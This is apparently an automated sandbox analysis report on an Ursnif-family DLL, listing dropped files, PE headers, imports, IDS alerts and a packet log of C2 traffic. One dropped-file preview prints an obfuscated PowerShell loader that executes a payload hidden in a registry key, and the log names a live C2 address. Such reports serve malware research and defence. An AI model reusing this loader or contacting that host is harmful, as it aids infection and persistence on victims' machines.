                            Malicious:false
                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                            C:\Users\user\TestLocal.ps1

                            Download File
                            Process:C:\Windows\explorer.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):218
                            Entropy (8bit):5.411852919034256
                            Encrypted:false
                            SSDEEP:6:QHXv1sr3gK1C+LgyKBM34H6dNH83F1tu4r9iyeqmM:Q39sTN13LgyaI4HscA4cyeHM
                            MD5:965E42B72C6150D487D2F6487DF81B2D
                            SHA1:A0C711D3725E07226527E96B9B939FAD97C9A20D
                            SHA-256:625461A15B47DFC81DBD5EDD7004771F0F23069047F866189D817EFC7DB8BAA0
                            SHA-512:19CBF9CBA5F1888510D5C9A24A3C75FF2B5B2323E94CD034D57399D8C676CE2957E56914862BAA79AD0E6B4EA4BE8E0206048A02C4BB64F5F987C32ACDA62AE6
                            Malicious:false
                            Preview:new-alias -name dvjac -value gp;new-alias -name wsnvbi -value iex;wsnvbi ([System.Text.Encoding]::ASCII.GetString((dvjac "HKCU:\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))

                            C:\Users\user\WhiteBook.lnk

                            Download File
                            Process:C:\Windows\explorer.exe
                            File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
                            Category:dropped
                            Size (bytes):838
                            Entropy (8bit):3.073236880282747
                            Encrypted:false
                            SSDEEP:12:8glVm/3BVSXvk44X3ojsqzKtnWNaVgiNL4t2Y+xIBjK:8p/BHYVKVWiV57aB
                            MD5:CA1C201059C5BFD5900F5EB2466883CC
                            SHA1:BF3670A8C06A4FABC5C410F368E178B353F9166C
                            SHA-256:E5717E89B0D46C5E89F39410FA7A9DE94AA6A3301F8AC920F84F1A7179554085
                            SHA-512:2273AF46D41B9698B23AEADD8EFBEF80017CFD465B4347CFB99C2FEAE371F39A511288AA64AAFA2E35DD2AD883D8E43D70A65E62C18977C6C6D85E3153041D4C
                            Malicious:false
                            Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....Z.1...........System32..B............................................S.y.s.t.e.m.3.2.....t.1...........WindowsPowerShell.T............................................W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l... .N.1...........v1.0..:............................................v.1...0.....l.2...........powershell.exe..N............................................p.o.w.e.r.s.h.e.l.l...e.x.e...........\.p.o.w.e.r.s.h.e.l.l...e.x.e.........%...............wN....]N.D...Q..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.................

                            Static File Info

                            General

                            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.102098470589205
                            TrID:
                            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                            • Generic Win/DOS Executable (2004/3) 0.20%
                            • DOS Executable Generic (2002/1) 0.20%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:626a983c091a8.tiff.dll
                            File size:618496
                            MD5:388aa15c4d1a96534e7ca5587942fa0a
                            SHA1:a88e07643c07c8f75845c82c19cd928355d441b2
                            SHA256:abc6dfca9ad106cf41da3b6309a15e2a761991d2fad41662211b1afb1c2b0973
                            SHA512:c21861d1e8a81159e615431afa9c6da74d92aeb13f9471e3d8af2bdc979f8be85ed2eb7ef3835fe86812fdb5955d6351ca8dbd7d6c164007bc9c41fb09266f56
                            SSDEEP:6144:eBbkmU1vOuplJ9dX8vxxaYuQ1n79lmdrjhXccbwD1Yl/R0odd6MbBCKaD3abuFGs:iUJVpX9cgQ1n7DQjbES/OodJ+sS
                            TLSH:7FD4E029C7601A6AD81537791899803F0A39F578E32F70EF26847D6FB50A6F05A34F39
                            File Content Preview:MZ......................@...................................,...........!..L.!This program cannot be run in DOS mode....$........I.R.(n..(n..(n......(n..z...(n..P...(n.fLj..(n..vl..(n..z...(n..P...(n.._...(n..z...(n..z...(n......(n.fLk..(n..z...(n..z...(n

                            File Icon

                            Icon Hash:9068eccc64f6e2ad

                            Static PE Info

                            General

                            Entrypoint:0x401023
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                            DLL Characteristics:TERMINAL_SERVER_AWARE
                            Time Stamp:0x411096D1 [Wed Aug 4 07:57:05 2004 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:0
                            File Version Major:5
                            File Version Minor:0
                            Subsystem Version Major:5
                            Subsystem Version Minor:0
                            Import Hash:de44747c447d17324a209c20a63c5698

                            Entrypoint Preview

                            Instruction
                            jmp 00007F848CE02CCDh
                            jmp 00007F848CE33348h
                            jmp 00007F848CE02A43h
                            jmp 00007F848CE0281Eh
                            jmp 00007F848CE02AC9h
                            jmp 00007F848CE026A4h
                            jmp 00007F848CE3888Fh
                            jmp 00007F848CE027CAh
                            jmp 00007F848CE2BCF5h
                            jmp 00007F848CE3BB30h
                            jmp 00007F848CE3774Bh
                            jmp 00007F848CE3CC36h
                            jmp 00007F848CE02751h
                            jmp 00007F848CE2CE8Ch
                            jmp 00007F848CE3F3B7h
                            jmp 00007F848CE366A2h
                            jmp 00007F848CE2DEDDh
                            jmp 00007F848CE414F8h
                            jmp 00007F848CE028D3h
                            jmp 00007F848CE3E05Eh
                            jmp 00007F848CE34529h
                            jmp 00007F848CE2EEF4h
                            jmp 00007F848CE3DC8Fh
                            jmp 00007F848CE02A2Ah
                            jmp 00007F848CE39935h
                            jmp 00007F848CE31240h
                            jmp 00007F848CE4148Bh
                            jmp 00007F848CE30106h
                            jmp 00007F848CE02A21h
                            jmp 00007F848CE0272Ch
                            jmp 00007F848CE3AA67h
                            jmp 00007F848CE403D2h
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3

                            Rich Headers

                            Programming Language:
                            • [IMP] VS2012 UPD4 build 61030
                            • [ C ] VS2013 UPD2 build 30501
                            • [IMP] VS2013 UPD3 build 30723
                            • [IMP] VS2010 SP1 build 40219
                            • [C++] VS2013 build 21005
                            • [RES] VS2008 build 21022
                            • [IMP] VS2013 build 21005
                            • [LNK] VS2015 UPD3.1 build 24215
                            • [EXP] VS2008 build 21022
                            • [ C ] VS2013 UPD3 build 30723
                            • [C++] VS2017 v15.5.4 build 25834
                            • [RES] VS2013 build 21005
                            • [ C ] VS2017 v15.5.4 build 25834

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8a0000xa0.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x8b0000xc100.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x980000x1010.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x400000x38.rdata
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x8a2ac0x20c.idata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x10000x1.text
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x3efe00x3f000False0.375895182292data4.45975589538IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            .rdata0x400000x3fb5f0x40000False0.815296173096data7.22910177016IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x800000x95370x7000False0.3271484375data5.47009773382IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .idata0x8a0000x98d0x1000False0.2060546875data2.48883672307IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .rsrc0x8b0000xc1000xd000False0.465106670673data5.38059585556IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x980000x17d70x2000False0.237915039062data3.90488138375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountry
                            RT_BITMAP0x8b5100x666dataEnglishUnited States
                            RT_ICON0x8bb780x485dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                            RT_ICON0x903d80x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544EnglishUnited States
                            RT_ICON0x929800xea8dataEnglishUnited States
                            RT_ICON0x938280x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                            RT_ICON0x940d00x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_DIALOG0x946380xb4dataEnglishUnited States
                            RT_DIALOG0x946f00x120dataEnglishUnited States
                            RT_DIALOG0x948100x158dataEnglishUnited States
                            RT_DIALOG0x949680x202dataEnglishUnited States
                            RT_DIALOG0x94b700xf8dataEnglishUnited States
                            RT_DIALOG0x94c680xa0dataEnglishUnited States
                            RT_DIALOG0x94d080xeedataEnglishUnited States
                            RT_GROUP_ICON0x94df80x4cdataEnglishUnited States
                            RT_VERSION0x94e480x290MS Windows COFF PA-RISC object fileEnglishUnited States

                            Imports

                            DLLImport
                            msvcrt.dllfgetwc, strcoll, srand
                            GDI32.dllGetBkColor, ExtSelectClipRgn, GetTextMetricsW, GetCharWidthFloatA, GetCharWidth32A, GetTextCharacterExtra, GetCharWidthA, GdiComment
                            KERNEL32.dllGetStringTypeA, WriteProcessMemory, GetCommTimeouts, GetConsoleCP, EnumResourceTypesA, GlobalFlags, GetFileTime, GetThreadLocale, LocalHandle, GetLargestConsoleWindowSize, EraseTape, GetDiskFreeSpaceExA, lstrlenA, GlobalMemoryStatus, GetModuleFileNameA, GetBinaryTypeA, DebugBreak
                            ADVAPI32.dllRegGetValueA, GetFileSecurityA, EnumServicesStatusExW, InitiateSystemShutdownExW
                            mscms.dllGetColorDirectoryW
                            USER32.dllGetClientRect, GetClassNameA, GetPropW, GetScrollBarInfo, DeleteMenu, MessageBoxIndirectW, GetMenuItemRect, GetMessagePos, DefMDIChildProcW, GetUpdateRgn, LoadMenuA, GetQueueStatus, GetMessageW
                            OLEAUT32.dllLoadTypeLibEx, GetRecordInfoFromTypeInfo

                            Version Infos

                            DescriptionData
                            LegalCopyright A Company. All rights reserved.
                            InternalName
                            FileVersion1.0.0.0
                            CompanyNameA Company
                            ProductName
                            ProductVersion1.0.0.0
                            FileDescription
                            OriginalFilenamemyfile.exe
                            Translation0x0409 0x04b0

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            04/28/22-15:47:50.266267 04/28/22-15:47:50.266267TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975980192.168.2.494.140.115.8
                            04/28/22-15:47:52.636763 04/28/22-15:47:52.636763TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975980192.168.2.494.140.115.8
                            04/28/22-15:47:51.337694 04/28/22-15:47:51.337694TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975980192.168.2.494.140.115.8

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Apr 28, 2022 15:47:50.154853106 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.218705893 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.218843937 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.266267061 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.320728064 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.638051987 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.638118029 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.638174057 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.638236046 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.638288975 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.638313055 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.638349056 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.638394117 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.638417006 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.638451099 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.638520956 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.638530970 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.638581038 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.638623953 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.638645887 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.638681889 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.726372004 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.726438999 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.726490021 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.726505041 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.726519108 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.726572990 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.726584911 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.726670027 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.726720095 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.726751089 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.726792097 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.726804972 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.726833105 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.726881027 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.726908922 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.726959944 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.726972103 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.727008104 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.727075100 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.727114916 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.727133989 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.727178097 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.727196932 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.727238894 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.727242947 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.727287054 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.776987076 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.777057886 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.777101994 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.777141094 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.777159929 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.777196884 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.777245045 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.777256012 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.777292013 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.777318001 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.777363062 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.805203915 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.805263042 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.805308104 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.805382013 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.805407047 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.805668116 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.805738926 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.833364010 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.833420038 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.833460093 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.833483934 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.833512068 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.833556890 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.833636045 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.833705902 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.833755016 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.833769083 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.833798885 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.833830118 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.833878040 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.833890915 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.833925009 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.833950043 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.833991051 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.834007978 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.834045887 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.834068060 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.834115028 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.834126949 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.834172964 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.872472048 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.872628927 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.881824970 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.881871939 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.881913900 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.881953955 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.881974936 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.882004976 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.882044077 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.882057905 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.882092953 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.882117033 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.882174969 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.882219076 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.882268906 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.882337093 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.882375956 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.882395029 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.882424116 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.882481098 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.882525921 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.882566929 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.882613897 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.882657051 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.882704973 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.888736010 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.888778925 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.888818979 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.888858080 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.888876915 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.927875042 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.927942991 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.927987099 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.928030968 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.928056955 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.928109884 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.928162098 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.928175926 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.928205013 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.928234100 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.928275108 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.929815054 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.929861069 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.929898024 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.929919958 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.929939032 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.929980040 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.933605909 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.933710098 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.976166010 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.976196051 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.976227999 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.976243973 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.976264954 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.976280928 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.976291895 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.976316929 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.976325035 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.976352930 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.976366043 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.976399899 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.976648092 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.976672888 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.976697922 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.976706028 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.976722956 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.976739883 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.976964951 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.976991892 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.977030993 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.977041960 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.977081060 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.982196093 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.982223034 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.982247114 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:50.982307911 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.982362986 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:50.999259949 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.000253916 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.025690079 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.025724888 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.025751114 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.025774002 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.025820017 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.025924921 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.025942087 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.025960922 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.025971889 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.026014090 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.027251005 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.027282953 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.027302027 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.027371883 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.027399063 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.027434111 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.027456045 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.027482033 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.027502060 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.027513981 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.027829885 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.034410954 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.034437895 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.034461975 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.034488916 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.034509897 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.073473930 CEST804975994.140.115.8192.168.2.4
